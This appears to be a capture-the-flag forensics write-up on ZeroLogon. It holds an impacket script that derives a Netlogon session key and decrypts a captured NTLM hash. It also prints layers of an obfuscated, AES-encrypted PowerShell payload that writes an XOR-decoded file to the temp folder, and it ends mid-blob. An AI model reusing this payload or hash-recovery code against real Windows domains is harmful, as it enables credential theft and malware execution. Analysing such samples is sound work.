lanleft/Banking_Tech.md

## Banking_Tech.md

      
    Raw
  

              Banking_Tech.md
            
          
    ZeroLogon 1

from impacket.dcerpc.v5 import nrpc, epm
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5 import transport
from impacket import crypto
from impacket.dcerpc.v5.ndr import NDRCALL
import impacket

from binascii import hexlify, unhexlify
from Cryptodome.Cipher import DES, AES, ARC4
from binascii import hexlify, unhexlify


serverChallenge = b'fe216509397c0893'
sessionKey = nrpc.ComputeSessionKeyAES(None,b'\x00'*8, unhexlify(serverChallenge), unhexlify("31d6cfe0d16ae931b73c59d7e0c089c0"))
print("session key: ", hexlify(sessionKey).decode())

enc = b'97357430f9fee6fb3b32bdea7a3b206d'
pwdata = impacket.crypto.SamDecryptNTLMHash(unhexlify(enc), sessionKey)
print ("pwdata: " + hexlify(pwdata).decode())
# 24631463edc7d6a03657f1ea0f3cff7b
ZeroLogon 2

1. After decode by base64

.( $sHeLLiD[1]+$sHELliD[13]+'x')(( neW-oBJECt ManagemEnt.AuTOmaTiOn.PSCREdENTIal ' ',( '76492d1116743f0423413b16050a5345MgB8AG0AZwBMAHQASQAzADAAQgBOAGEAQwBMADcAVABRAFgAZABFAFUAWgBqAFEAPQA9AHwAYgAwAGYAYwA4AGEAMABlADUAMgA2ADQAMAA5ADAAYQBlAGMAYgAyAGIAOAA3AGMAOABlAGMAMgAxADkAOQBhADIAZAA0AGIAZAA5AGEANwA2AGUAMwA3ADkAZAA0ADUAMgAzADQAZAAwAGQAYQBiADYAOABmAGEAYQAxADgAZABmAGEAMgA2ADQAYwBkADAAYwA1ADIANQA1ADQAZgAwADIAOQAwAGMAZQAyADMANwBiADgAMQA5ADEAOQA3AGUANgA1ADkAMgBmAGEAMwBmAGMAMQBmADkAMwAzADQAZgBiADkAMgBiADYANwA5ADUAOQA0ADQAZQBkADMAYwA3ADQANAAwADAAZgA4AGIANgAwADIAYQBkADEAMgA3ADIAYwBiAGIAZAAwADUANwA1ADgANgBiADgAMgAyADIAMAAwAGYAMQA2AGQAOAAxADAANQAzAGUANgA1ADMANQBjADYAOQA4ADEAMwAyADgAOAA0ADkAMAA0AGEAYQAwAGMAMgBlADYAMQBkADAAMgBkADUANgBmAGIAYwBjAGQANQAxADYAOABlADkAYgA2ADEAYgBjAGQAMQA0ADQAMgA4ADAANQBlADkAMwA5AGUAOQAzADAAYQA3AGYAZAAwAGEANQBmADcANABhAGEAYgA2AGYAYwA4ADEAZABjAGEAMwBmAGMANwBkAGQAMwAzADYAZQBiADIAZQBlADUAOQAzAGIAYwA3ADAANQBiADEAZABiADUAZQAyAGIAZQBmADAAMQA3AGEAZQBhADAAYwA0AGIAZABjAGUAOQBlADcANQBiADgAZgBhAGQANABmADAANwBiAGYANABiAGQAZgAyADMAYQAxADEAYgA1ADgAZgAzADcAOAAxAGUAYgAzAGUAMgAwAGYANgA1ADIAMgAyAGUAZgBkADAAZAA2ADUAMABhADgAZgBjAGIANQA2AGMAMgA1ADcAMQBjADkAYwBiADkANABiADkANQA1ADIAZAAxADIAZAA5ADEAMwBlADIAYwAyADkANwAwAGUANAA0ADAAOAAwADMANQBlAGUANAAxADUAZABmADUAZgBhADMANAA4ADkAZgBjADQAMwA0ADAAOQA2ADAANgAxADIAZQBlAGMAOQA2ADIAOQA0ADgANQA0ADMANwA1ADAAYwA1ADYAOQBmADEAZABiAGYAMQA4AGUANAA4AGMAMQA5ADAAZAA2ADUAYgAyADgANgA3AGYAYgBjADcAZgAyADMAYwA2AGUAYwA3AGUAZQBmADgAMwAzAGMAMgA2ADkAZQAxAGEAMAA1ADkAMgBkADEANgAyAGIAMAA4AGIAOAA5ADIAMQBiAGEANABiADEAOABjAGQAZgBmAGYAYQAwAGYAMwBmAGMAMQAwADUAZgBiAGYANABlADQAZgBmADcAOABjAGUANwA2AGEAMwA1ADAAZgAwAGQAYgA1ADQAMQA4AGYAYQA3AGEAZQA0ADYAYgAyAGUAZQA0ADgANAA0ADkAMQA5ADkANAAyAGQAYQBhADAAZAA4ADYAZQA5AGMAMgA0AGYAZgA4AGEANwAwADgANQA2AGUAOQBkADEAZgA2ADQANgAzAGQAZgAwADUAYwA3ADIAMABjADcAYwBlADMAOQAyADIAZQBhAGQAYQBlAGQAMgA0AGIAMgBlAGQAOQBiADUAMAA4AGYANQA4ADAAZQA5ADUAMgBmAGEAMgAyADkAMwA2AGIAMQAyADYANwA3ADUAOABmAGEAZQA1ADkANQA2ADIAOAAxADgAMQA4ADYAMgAyADQAOAAxAGUAZAAwADMAYgA4ADkAZQA5ADgAMgA1AGYAMgBmAGIANwAyAGYAZgAyAGEANwA5AGMAMwA5AGYAZAAyADUAMwA1ADAAZgAwAGEAYgBlADkAMABlAGIAOAA0AGQAZAA5ADMAMgA0ADEAMQA1AGUAMAA0ADEAMgAyADgAYQA0ADMAZAA3ADAAYwA1AGUAOQBmADQAYQBhADMANQBhADYAOAAxADAAZQA1ADkAOABmADMAMABkAGEAYQBlADAANQAyADUAYQA0AGYAOABkAGMAYwBhAGIAMABjADEAYgAzADkANAAzADMAYwA3AGQAZQA4AGUAYgA5ADEAMABkADIAOQBiADEAYQA1ADkAZAA1AGUAMwA3AGUAOQAyAGUAMQBmADEAOQBkAGUAMAA2AGEAZQAxADkAYQA4ADgANAAzADcANQAyADUAOQA2AGIAOQAxADYANwA3ADQAMQBlAGQAOAA4ADAAOQA0ADUAYgBmADUAOQA2ADgAYwBhAGUAOQAzADMANwA1ADkAZgAyADQAZAA1AGYAZABmAGIAZQBlAGMAMQAxADcAYQA4ADYAMwBjAGEANgA3ADEAMgA3ADYAZgA4AGMAMQBhAGEAZAA2AGEAYQBjADAAMgAwADAAYQA4ADUAOAA3AGQAMwA0ADQAOABmAGEAZgBkADMANABhADYAMQBiADIAMwA1AGUAOAA5ADQANgBlADAANQA2AGIAZABmADQAMQAwADgAMgBiADUAMgBhADUAYQBlADEAYwAzADIAMwA0AGUAOQA5ADMAZQAwADAANwA5ADkAZAA3AGUANwAyADQAOQAzAGQAMwA3ADMANwA3AGYAYwBiAGIANAA4ADcAOQA1AGIANQAxAGMAYwA0ADEAYQBkAGYANQAxAGEANAA2AGEAYwA2AGQAMABhAGIANwBhAGIAZQA1ADYAMQBkAGQAMgBlADMAZgA1AGEAMgBkAGEANgBmAGYAYwA0AGMAMgA4ADQAOQA3ADgAZgA0ADcANAA4ADIAMwA1ADcAZQAzAGEAOQA1ADYAZgAxADIANQA0ADMAMAA2AGIAMQA0AGYANgAwAGYANABkADMANwBhADUANgA3AGEAMAAyADkANAA4ADEAZQA0AGYAOAA4ADEANgAyADEAZABiADgAOABlAGQANAA2AGEAYwBlADMAOAA1ADUANgAzAGEAMwA5AGEAMAA5ADMAZAA2ADAANwBjAGMAZQA3AGIAOAAxADUAYQAwAGYAOAA0ADEAZQBjADMAOQAwAGIANQA5AGMAYwAxADQAMwBlADQAZABlADkAZAAwAGEAMgA3ADkANgBiADQAYgBjADAAYgBlADEAMwBjADIAOABiAGYAMQA4ADIANABiADMAZQBkAGIAMABkAGQAZABiAGQANgAwAGQAOAA0ADEANwBhADgAMgA2AGIAZABhADYAOQAwADQANwAzADUAZgA4ADEAMQBlAGYANgAxADEAZQA2AGMAMAA3ADUAZgA5ADQANABmAGMANQAzAGYAMAA2ADEAZQBiAGYANwA1ADkAZAAxAGUAYwA2ADkANABkAGEAMgBhAGUANwAwADcANAAzADAAOQBmAGIAYgBkADUAZABkADEANgA1ADEAOQA0AGQAYgA4ADgAMwBmADQAOQBiADgAMgBiAGEANABhADMAOQBkAGYAMgBkADQANAAxADkAYQA5AGEAMgAzADcANwA0ADQAZAAwAGUANABlADYAYgBlADMANABhAGIAZQA4ADMAOQA4ADMAYgA4ADkANQAyAGUAMABjADkAOAAwADMAYgAwADEAYgA1ADYANwBjADcAZABiADQAOAAxADgAOAA4AGMAYQA3AGMAOQA1AGUANAA4ADEANgBiADcAOQBkADMAMgA3ADIANAA2ADUAZQAzADcAZgBkADAAZQA3AGUANgBmADMANQAyADEAZABiAGMANwA5ADIAZABlAGYANQAyADIAYwA3ADQAYgA4ADUAMAAzAGUANABlADAAOQAyADIAZAAwADUAZQBmADcAZABhADIAZgA4ADAANgBhADgANgAwADYANwBhADUAMQBkADQAZQAzAGIAYgAxADYANgA3ADQAYQAwADAAMQBhADMANgBkAGIAYgA1AGMAMABhAGIAYgAwADcAZgBiADIAZQBmADgANAA5ADEAZAAwADAAYQA5AGUAMQA0ADEANwBmADUAMABkADAANwAxADIAOQAxADYAYwBjAGYAZgAxADcAYwA3AGMAMABjAGEANgBjADUAOAA0ADYAOQBkAGMAYQBmADQAZABlADYAMQBkADIAOQA1AGQANwAyAGYAYwBkADYAZgAwADMAZgBhADIANQBlAGEANQBiADYANAAxADgANQAyADIANAA0ADQAYwAxADMANQAyADkAOQAzADcAZQAzADcANgAwADQAYQA0AGEAYwA0ADIAOABhAGQAOQBiADUAYQBhADgAOAAxADYAYQBiAGMANwA4ADMANwBkAGQAMABkAGQAYwA5ADAAOQAyAGQAZQA5AGUAZQBiAGIAMgAxADIAZABkAGEANwA4ADQAZQBlADQAZAA5ADUAZAA3AGQAYgA3ADUANgBjADgANAA2ADgAZgA1ADQAMgA1ADkAMQA0ADEAYgBjADAAZAAzADAANwAzAGIAYwBhADAANgAyADcAMAA3ADUANQA3ADQAYQAzADEANQAwADIAMgAwADAAOAAzAGMAOAA1AGEAMAAzADEANQAzADMANAA4ADMAMgA4AGYAOQAzADQAOAA5ADYANgBjADIAMQAwAGQAOAA1AGIANgAzAGEAZAA0ADYAMQA3AGMAZQA3ADkAZABmADUANwA0ADIAYwBmADgANgA4AGIAMAA1AGEAMgA3ADcANQBiADEAYQA1ADAANABmADkAZgA1ADcANQA3AGUANgA1ADkAMQAzAGIANABmADYAOQAwADIAZAA3AGQANgA0AGMAZQBjAGIAOQA0ADYAZgBlAGQAOQAwADYAZAA0AGQAOQBmADMANAAyADMAOQBlAGUAMQAwADEAYgBjADMAOABiAGYAYgBjAGIAMABjADEAZQAyADMAYgBjADUAZAA1ADYAMAA5ADcANAAzADIAYgBkAGYAYQA0AGEANgBkADcANgAyAGUAMwA1AGYANgAwADgAYQBiADYAMgBmADgANwBmADMAOABkAGEANABkADAAYgBhADYAYgBjAGEAOAA3ADkAMAA4ADQAOAAwAGQANQA2ADUAZgAyADMAMQBkAGUAMQAwADMAZABkAGYAOABiAGEAYgAxADgAOQA0ADcAMwAwADgAOQA3AGYAMgAzADAAMABlADUAZQAwADYAOAAwAGIAYwA1AGUAZQBjAGUAYgAwADUANQBmADgAMAA2AGYANQBhADIAYQBmADcAYQAxADgAZgAxADEAZQA2AGEANwBjADUANQBmADAAYgBlADAAZgBiADcAOQA2ADgAYwA3ADIAZgA5ADYANwA3AGEAMwBkADUAMgBlAGQAYgA0AGIAZQA4AGUAMwA5ADIAYQA1ADAAYwA5ADQANwAxAGMANwA2ADMANABjADEAZAA4ADUAMAA4AGYAYgA2AGMANQAwADEANQBiADkAYwAyADgAYwBiADYAMQBiADgAYgA3ADkAOQA0ADIAYQBlADEAMQBlADYANwA1ADEAOAA4ADUAYgAxAGUAYwBiAGEANwBlADYAZQAxAGEAZgBiADUANgA3AGEAYQA1ADQANAA1ADgANABlADQANAA5ADYAMgBlADQAZAA5ADgAOAAyADcANAAxAGMAZABiADEAZAA1ADgAZgBkAGEAMgBlADkAZQBhAGMANQA4ADAAYgA0AGMANAAyADgAMgAyAGEAZQA3ADgAOQBlADEANwBlADEAMgBhADEAYQA3AGYAZQBhAGUANwBmADkAZgA1ADUAZAAxADQAZQAwAGIANQA3AGYAZgA5ADEAZQA5AGQANQAzAGIAZQBiADAAOQBiADYANABmADAAOQBkADIANABkAGQANwAzADIAZQBlADEAOQBiADUAZQA0AGQAMABkAGIAYQBiADgAOQBkADkAMQA1ADgAOQAwADQAYgA3ADQAYQA0AGYAMwA1ADEAMAA1AGMAZgAxADIANgBjADYAMwAzAGIANQAzAGYANwA2AGQAYwA5AGQANgBkADkAOQBkADgAMgBmADMAOQA5ADQAZgBiADEANAA5ADYAMwBkADkAYgBjAGEAMQA3AGEAYgAwAGYAMAAxADAANwBiADkAMQAzADYAMgBjADQAMgBmAGUANAAwADEAYwA4ADgAMQA5AGQAMABhAGQANQBiAGUAMwA2ADYAOQA3ADYANABhAGQAYgAwAGEAZgA5ADUAYQAxADUAZAA5ADYAZQAwADgANwA2ADkAYgBmADAANwA5ADYAOQAxADQAZgA0AGQANQBkAGIAZAAxADMAYQA3ADUAMAAxADAANwAzADAANgBlADMAMgAxADMAMQBmAGYAOAA2ADQAOAAwAGMAMQBmADgANgAxADgANQBhADYAOQBjADIANABhAGUAMABkAGUANgAyADMAZABlAGEANgBiAGYAMABlAGEAMAAxADUANQA4AGYANABjADYAZABjAGIAMgA5ADcAZAA0AGUAMQA5ADMAMgA3ADUAZgAyAGEAZAAxADkANAAyAGIAZABkAGMAZQA4ADcANQA5ADcAMwBhADAAZAA2AGIAMQAyAGEAZAA4ADAAYwAxAGMAMgA2AGIAZgA4ADEANQA0ADgAOQBkAGYAZAA2ADQAOABiAGQAYQAwAGYAZgA5AGIAMgAwADQAYQAyAGYAZAA5ADgAOQA1AGQAMgAxADEAYgBiAGMAMgAyADcANABjADQAMgA1AGUAYQBjAGYAZgAyADAAMwAxAGQAOABjAGQAYQAwADYANQA5AGUAMgA4ADYAOQBhADUAZAA1AGUAOQA2ADIAZQAzADgAMgAwADAAOQBkADkAZAAwADcAZgA0AGMAYgA5ADQANwA5AGUAYwBhADUANgBlADMAZgA5ADQAZAAzADgAZgA4AGMAMwA4AGMAOQA0ADYAZAA1ADgAMQBiADgAZQBiADAAYwBhAGEAZAA0ADAAMgA2ADQAMwBiAGUANwAxADUAYwA1ADMAZABhAGQANgA2ADIAYgBkAGIAYwBkAGYAYQBjADcAOQBjADUAMgA3AGMAMwA1ADAANAA3ADQAYgA0ADMAZAA1AGQAZQAzADEANQA2ADcANwA1AGEAZABhADYANgBkADAAMwA3ADcAZgBlAGEAZABlADkANAA4ADQAYwAwADkAMAAyADMANgBmAGUAYwBlAGIAYQAwADkAYQBjAGUAMgBlADcAZgBkAGIAMgBmADUAMgBmADUAYQA1ADcAMQAzADIAMwBmAGYAYwBkADEAMwAxAGYAMwA1ADIANABkADgANAA3AGEAYwBkADMAMQAxAGYANgA3ADUANgBlAGEANgAyADAAZQBhADcAYwBkADUANgBlAGUAMQA3ADcAMABmADUAMgBjADQAYQBkADMAMwBlADIANABkAGQANAAyADAAMwA2ADkAMAA4ADUAMwAyADcAMQAwADIAMQAzAGMAZAA4AGUAYQBiADMAMQAzADQAMwA1AGEANAA4AGYAZQBlADIAOAAyADMAZgAwADEANgBkADAAYQA4AGYAMgBiADgANgBmAGQANAAzADMANQA0ADcAZgBkADkAOAAxADQANgA4AGMANwA1ADAAOQBiADMAYQAxADMANQAxAGEAOABjAGYAYgA4ADEAMAA3AGYANQAzADkANwBmADcAMwA5AGYAMgA2AGQANABlADgAZgA3AGUAMABiADYAYQBkADAAYwBjADcANAAyADEANgAyADMAYwAxADIANQA2AGQAMgA2AGYANwA0ADUAZgA4ADYAZAAwADQAMAAxADAAYgA1ADEAMAAwAGYAOQBhADAAMQBkADkAZABiADYANABjADEAOQBiAGYAYgBlADUANwBmAGMANQA3AGUAZgBiAGEANgA5AGEAMwBhADQANgA5ADAANgAyADUAMAAyAGUAZgA3ADQANwA2ADcAMAAyADUANgA2ADUANAA4ADgAYgBiADkANAA0AGYAZQBlADgANQBhADAAYgBhAGIAYQA4ADAAMwAxADQAYgBkADkAZABkAGUAMQAzADUAMQBkAGUANgBhAGEAZQBlAGUAYgBlADcAYQAyAGMAYQA3ADAANgA3AGMAMQA3ADgAYwA0ADQAMQAzAGEAZABhADIAZAA5AGEAYQBiADcAZgAyAGMANQAwAGUAZQBlADkAMQBmAGUAYwAyADEANQAwADkANAA1ADgAOABmADcAMQA0ADQAYwA5ADkAZABmAGYANAA5ADQAYwA5ADcAYgAxAGYAOQA3AGIAMwBhAGYANwA5ADMAMgAxADIAYQBjADYAMQAxAGMANAAyADYANwA3ADkAMQBiAGUAYQA3AGIAMQAxAGUAMAAyAGQAMgAwADUAZABkADIAYQBhADgANgBmADEAOAA1AGIAOQA0AGMAYwBlADYAMABmADAAZQAzADMAMQAyADYANwAzADYAYwBmAGQAYwBmAGQANwBjAGYAZQBmADYANwA3AGEAZgA4ADgANgA3ADcANQBiADQANQA4ADEAMwA5ADAAOQA0ADMAZQAxADUAZAA4AGYAYgA0ADYANgAwAGIAMAAxADIAZQBlADIAMQA3ADkANQA2ADUAZgBmAGUANwAxADcAYwBmADcAOAA3ADcANwBiAGYAMQBjADUAMAA2ADUANAA2ADcAOAA0ADkANwAzADgAYQBmAGUAZAAyADgAYwAwAGQAOAAzADMAMQA2AGUAMwA4AGQAMgBiADYAYwAwADgAOQA0ADYAZgBjADcAMwBjADUAMgA2AGQAOQAwADIAZQAxAGQAMABiADgAMgBjADMANwA1ADUAYwAyADYAMgBmADMAMwA4AGEAOQAwADAAMwA5ADAAMwAyADkAMAA1ADAANQBiADgAYwBjADYAMABjAGIAMQAwAGIAOABiAGMAMAAzADEAYQBjADIAMQA1AGUAMAA0ADQAYQAxADAAMAA5ADMAYgBlAGQAMwBiAGQAMABjADEAZABmADMAMAA2ADMAOAA3AGEAZQA5ADMANwBkAGEAYQA2AGQAMAAzADIAOABjADMANwAzADgAZABlADUAYQAxADMAZgBkAGIAOAA3ADYANAA3ADYAZABkAGUANQA1ADgAYwBjADEAMAA0AGEANgA0ADMAYgBhADgANgAzADUAZAA4ADMANgA3ADIAZABjAGIAZQAzAGYAMgBkADkAMgBjADgANABkADYANwA5AGUANgA1AGQAMwA5ADcAOAAzAGUAOQBmAGUAYwBiAGUAZAA2AGEAMwAwADcAMAA5AGMAYgAxADMAYgA0ADQANwAzADYANQAwAGIANwA2ADIAMwAxADIANgBlADEAZABkADUAZQBjADMAMgBmADIANAA5ADgANwBhADAANAAyADcAOABhAGUAZQBiADgANwBiADkANwA5AGUAZQA0AGEANQA0ADAAOQAxADYAZgAyADYANQBjADAAMQA1AGEANABiAGYAYQAyAGIAMwA5ADEAZQBmAGQANQA5AGYAYQA2AGEAYwAxADMAOQBhADgANwAwAGYAMgAxADcAMgAwADAAOAA3ADMAMwA4ADAANgA1AGQAYQBlADUANgA3AGEANgA0ADAANgA2ADIAZgAwAGUAMAAyADUAOAA1ADcANAAxADMAMQA5AGMAYwA5ADAAOQAzAGIAOQA4ADIAMAA4ADIAYgBkADkAYwBmAGIAZgA4AGMAOABiADcANgBjAGYAZQBkAGEAZQBlADkAOAA0ADEAMgBlAGUAMABmADUAMQA0ADYAYQA4ADMAMQAyADMANwAzADQAOAAwAGQAZABlADQAZQAxADkANABmADUAZABlADUAYgAzADUAMQA2ADMAOAA4ADYAYQBjAGIANwBmAGMANwAwADgANABkAGQAYgA1ADYAOABkADgAOQAyADkAMgA0ADkANwA2ADgAMwBhADcAZABmADEAMwBlAGUAYwAyADEAZQBiADcAZQAxAGYAYwBlADcAYwBlADIAOAAyADUAOQBjADQANwBmADIAYwBjADkAYgA2ADcAYwAyAGMAMgA4ADUANwAyADkAYgA1ADEAMQAyADAANQA0ADIAYwA1ADAANwAxADcANAA4AGEAMgA5ADUAMQA1AGMAMwAyAGQAZQA1ADEAMgAyADEANQBiADkAZAA1AGYAYwA4ADMAMAA0ADkANQA3ADQAMAAyAGUAMABiADIANgBmADcAOABkAGUAMgAwAGYAOQAxADIAMgA0ADMAMgAyAGYAMQAxADcAZgAwADEAZAA0ADYANABhAGYAOAA0AGMANAAwAGMAMAA0ADQANQA2ADcAYwA4ADMAOQA1ADMAMABmADQAYQA2ADkAYwAxADkAMQBhADcAOQBjADAAMwBmAGYAOQAxAGEANQAxADYANwA1ADQAYQAxAGEAMwAzADgAYQA1ADcANgA5ADkAMAAxAGUAOQAxADEAZgBlAGYAZAAxAGIAZQAzADgAZAAxAGUAOABmADQAZQA4AGIAZAA1AGIAOQA4ADYAMgBiAGEAOABiAGYAYwAyADEANQAzAGUAYQA1ADMAYgBmADkANQBhADMAYQA1ADQANgA4ADMANQBkADcANAA2ADAAZgAwADUAYwBkADUAOQA4AGIAZAA2ADkANAAxAGEAYgBlAGMAOQBmAGEAZgA2AGYAMgA1ADkAZQA3AGYAYgBiAGMAOQA3ADYAMwAyAGMANwAzAGYAZAA5ADgANwBkADMANgAwADkANwA1AGYAZAA3ADkAMgAwADUAYgA1AGYANAA0AGQAZgAxADIAYgAyADMAMQBkADEANAAyADQAZQA4ADQAMwA0AGEAZgAwADcAMgBiADAAZQBkAGQANgAyAGUAZgAwAGUAZABjAGIAZgA4AGIAMAA5ADEAMQAxAGQAYwBlADMANwA5ADgAZAA2ADIAMgA0ADEAZQA2AGMAYgBmADQANgBlADkAYwBmADkANABjADcAOAA5AGIAYwBjADYANwBlADYAYwA3AGQANwA3AGIAZAAxADgAOQBiAGQANgA0ADMANgA5AGMAMgA3ADgAYQA0ADgAYgBjADcAMwA2AGEAYQBhADUAYQA0AGMANABmADQAMwBkADUAZQA3AGMAMQBkADEAMgAxAGEAMAA1AGUANQBlADIAYwA1ADkAOAAyADIANgA1AGYAMwBjADcAZQAyAGEAYgA0ADYAYQBhADMANgBhADgAMQAwADUAZgBhAGMAMgBiADkAOABmADEAYQA2ADgAYgA2AGEAOQBkADIAYwAyADMAZAAzADkAOQA4AGQANwAxAGUAZgA0ADcANwBkAGMAOQA0ADUAZQA3ADAAYgAyAGEAMwAzAGUAOQBjADcAZQA2ADIAZgA4ADkAOQAwAGIAZABkAGMAMwA5AGMAMQBhADkAMwAwAGYAMwBjAGQAMgA3ADcAYQA0ADMAOAAzAGQAYwA2ADEAOAA0ADUANABmAGQAMwBkADYAZQAxAGQANQAwADgANQA3ADkAZgBiADgAOAAyADkAYgBlAGMAYwBiADQAMQAyADEANgBmADcAZAAzADUANgA4AGMAZgA4ADAANwA5AGYAOQBkADMANABkADYANQAwADAAMgBjADcAYwA3AGYAZQA5ADMAMQBkADUAZABhADQANAA3ADgAYwBkADQANgA4ADUAZQA1ADAAMAAwADcANwBhADcAYQA5AGMANgA5ADcAYQA5ADAANQA5ADQAOQA2AGQAZQBlADUAYgA5ADUAMwAxAGEAMwAyADkAZQBjADkAZAAwADcAZQBmADAAMgBhADYANQBmADkANAAzAGQAZAA0ADMANQAwADUAMgBjADUAMABjAGMANgAxADUAMwBhADkAYwA3ADEAMQBjADMAOQA0ADEAZQA1AGEAZQA4AA==' | CoNvERtto-SECUrEStrIng  -K 8,3,173,146,182,87,181,9,67,38,106,106,249,114,100,219,253,11,39,98,162,97,239,119,35,89,106,111,140,75,22,156 ) ).gETNEtwOrKcReDEntiaL().PASSwOrD) 
2. PSDecode

INvoKe-EXPrEssion ((("{54}{55}{3}{82}{7}{81}{74}{62}{65}{86}{12}{26}{67}{19}{11}{24}{52}{76}{25}{32}{35}{36}{69}{9}{22}{51}{43}{66}{45}{61}{18}{80}{50}{14}{75}{77}{29}{13}{68}{16}{2}{31}{15}{72}{85}{17}{73}{70}{59}{88}{89}{39}{53}{34}{5}{78}{41}{63}{38}{21}{33}{4}{46}{27}{48}{71}{10}{79}{37}{28}{64}{42}{20}{60}{49}{47}{6}{23}{57}{1}{84}{87}{83}{58}{40}{0}{56}{30}{8}{44}"-f '.IO.File]::Write','id();
','r (','t_','t_.Length];
}

tyPt','] -bx','[System.G','= tyPenv:C','s(tyPtmp,[B','3','Pat','49, 6','
ty','2','9, 28, 1','k.Lengt','
fo','	t',', 72, ',', ','strin','% tyPh','9,','uid]::Ne','6,',' 95','Pk =','= [','th();',' ','Byte','tyPi=0; tyPi -lt tyP',', 95,','os','k[tyPi',' 3','0, 43, 48, ','::GetTempPa','i ','t','
[System',' tyPh','
[','4','yte[]]tyPk);
',', ','mp ','Pname = ','Syste','y','2',' ',' 40, 44, 74','yP','t','yPhos','All','wGu','name;
','t','g] t','74','NA','ost_[tyP','
','M','9, 76',' 27, 39','8;

','114, ','Pk[','m.IO.','h','y','MPUTER','14,',',',' 27,','or','h]','30, ','O',' ','mp += tyP','
t','; tyPi++) {
','E;
','yPt','yPi]',' = ')).ReplACE('tyP',[sTRiNg][CHAR]36)) 
3. Decrypt AES

# create aes key - keep this secure at all times
$aesKey = (8,3,173,146,182,87,181,9,67,38,106,106,249,114,100,219,253,11,39,98,162,97,239,119,35,89,106,111,140,75,22,156)
$encrypted = '76492d1116743f0423413b16050a5345MgB8AG0AZwBMAHQASQAzADAAQgBOAGEAQwBMADcAVABRAFgAZABFAFUAWgBqAFEAPQA9AHwAYgAwAGYAYwA4AGEAMABlADUAMgA2ADQAMAA5ADAAYQBlAGMAYgAyAGIAOAA3AGMAOABlAGMAMgAxADkAOQBhADIAZAA0AGIAZAA5AGEANwA2AGUAMwA3ADkAZAA0ADUAMgAzADQAZAAwAGQAYQBiADYAOABmAGEAYQAxADgAZABmAGEAMgA2ADQAYwBkADAAYwA1ADIANQA1ADQAZgAwADIAOQAwAGMAZQAyADMANwBiADgAMQA5ADEAOQA3AGUANgA1ADkAMgBmAGEAMwBmAGMAMQBmADkAMwAzADQAZgBiADkAMgBiADYANwA5ADUAOQA0ADQAZQBkADMAYwA3ADQANAAwADAAZgA4AGIANgAwADIAYQBkADEAMgA3ADIAYwBiAGIAZAAwADUANwA1ADgANgBiADgAMgAyADIAMAAwAGYAMQA2AGQAOAAxADAANQAzAGUANgA1ADMANQBjADYAOQA4ADEAMwAyADgAOAA0ADkAMAA0AGEAYQAwAGMAMgBlADYAMQBkADAAMgBkADUANgBmAGIAYwBjAGQANQAxADYAOABlADkAYgA2ADEAYgBjAGQAMQA0ADQAMgA4ADAANQBlADkAMwA5AGUAOQAzADAAYQA3AGYAZAAwAGEANQBmADcANABhAGEAYgA2AGYAYwA4ADEAZABjAGEAMwBmAGMANwBkAGQAMwAzADYAZQBiADIAZQBlADUAOQAzAGIAYwA3ADAANQBiADEAZABiADUAZQAyAGIAZQBmADAAMQA3AGEAZQBhADAAYwA0AGIAZABjAGUAOQBlADcANQBiADgAZgBhAGQANABmADAANwBiAGYANABiAGQAZgAyADMAYQAxADEAYgA1ADgAZgAzADcAOAAxAGUAYgAzAGUAMgAwAGYANgA1ADIAMgAyAGUAZgBkADAAZAA2ADUAMABhADgAZgBjAGIANQA2AGMAMgA1ADcAMQBjADkAYwBiADkANABiADkANQA1ADIAZAAxADIAZAA5ADEAMwBlADIAYwAyADkANwAwAGUANAA0ADAAOAAwADMANQBlAGUANAAxADUAZABmADUAZgBhADMANAA4ADkAZgBjADQAMwA0ADAAOQA2ADAANgAxADIAZQBlAGMAOQA2ADIAOQA0ADgANQA0ADMANwA1ADAAYwA1ADYAOQBmADEAZABiAGYAMQA4AGUANAA4AGMAMQA5ADAAZAA2ADUAYgAyADgANgA3AGYAYgBjADcAZgAyADMAYwA2AGUAYwA3AGUAZQBmADgAMwAzAGMAMgA2ADkAZQAxAGEAMAA1ADkAMgBkADEANgAyAGIAMAA4AGIAOAA5ADIAMQBiAGEANABiADEAOABjAGQAZgBmAGYAYQAwAGYAMwBmAGMAMQAwADUAZgBiAGYANABlADQAZgBmADcAOABjAGUANwA2AGEAMwA1ADAAZgAwAGQAYgA1ADQAMQA4AGYAYQA3AGEAZQA0ADYAYgAyAGUAZQA0ADgANAA0ADkAMQA5ADkANAAyAGQAYQBhADAAZAA4ADYAZQA5AGMAMgA0AGYAZgA4AGEANwAwADgANQA2AGUAOQBkADEAZgA2ADQANgAzAGQAZgAwADUAYwA3ADIAMABjADcAYwBlADMAOQAyADIAZQBhAGQAYQBlAGQAMgA0AGIAMgBlAGQAOQBiADUAMAA4AGYANQA4ADAAZQA5ADUAMgBmAGEAMgAyADkAMwA2AGIAMQAyADYANwA3ADUAOABmAGEAZQA1ADkANQA2ADIAOAAxADgAMQA4ADYAMgAyADQAOAAxAGUAZAAwADMAYgA4ADkAZQA5ADgAMgA1AGYAMgBmAGIANwAyAGYAZgAyAGEANwA5AGMAMwA5AGYAZAAyADUAMwA1ADAAZgAwAGEAYgBlADkAMABlAGIAOAA0AGQAZAA5ADMAMgA0ADEAMQA1AGUAMAA0ADEAMgAyADgAYQA0ADMAZAA3ADAAYwA1AGUAOQBmADQAYQBhADMANQBhADYAOAAxADAAZQA1ADkAOABmADMAMABkAGEAYQBlADAANQAyADUAYQA0AGYAOABkAGMAYwBhAGIAMABjADEAYgAzADkANAAzADMAYwA3AGQAZQA4AGUAYgA5ADEAMABkADIAOQBiADEAYQA1ADkAZAA1AGUAMwA3AGUAOQAyAGUAMQBmADEAOQBkAGUAMAA2AGEAZQAxADkAYQA4ADgANAAzADcANQAyADUAOQA2AGIAOQAxADYANwA3ADQAMQBlAGQAOAA4ADAAOQA0ADUAYgBmADUAOQA2ADgAYwBhAGUAOQAzADMANwA1ADkAZgAyADQAZAA1AGYAZABmAGIAZQBlAGMAMQAxADcAYQA4ADYAMwBjAGEANgA3ADEAMgA3ADYAZgA4AGMAMQBhAGEAZAA2AGEAYQBjADAAMgAwADAAYQA4ADUAOAA3AGQAMwA0ADQAOABmAGEAZgBkADMANABhADYAMQBiADIAMwA1AGUAOAA5ADQANgBlADAANQA2AGIAZABmADQAMQAwADgAMgBiADUAMgBhADUAYQBlADEAYwAzADIAMwA0AGUAOQA5ADMAZQAwADAANwA5ADkAZAA3AGUANwAyADQAOQAzAGQAMwA3ADMANwA3AGYAYwBiAGIANAA4ADcAOQA1AGIANQAxAGMAYwA0ADEAYQBkAGYANQAxAGEANAA2AGEAYwA2AGQAMABhAGIANwBhAGIAZQA1ADYAMQBkAGQAMgBlADMAZgA1AGEAMgBkAGEA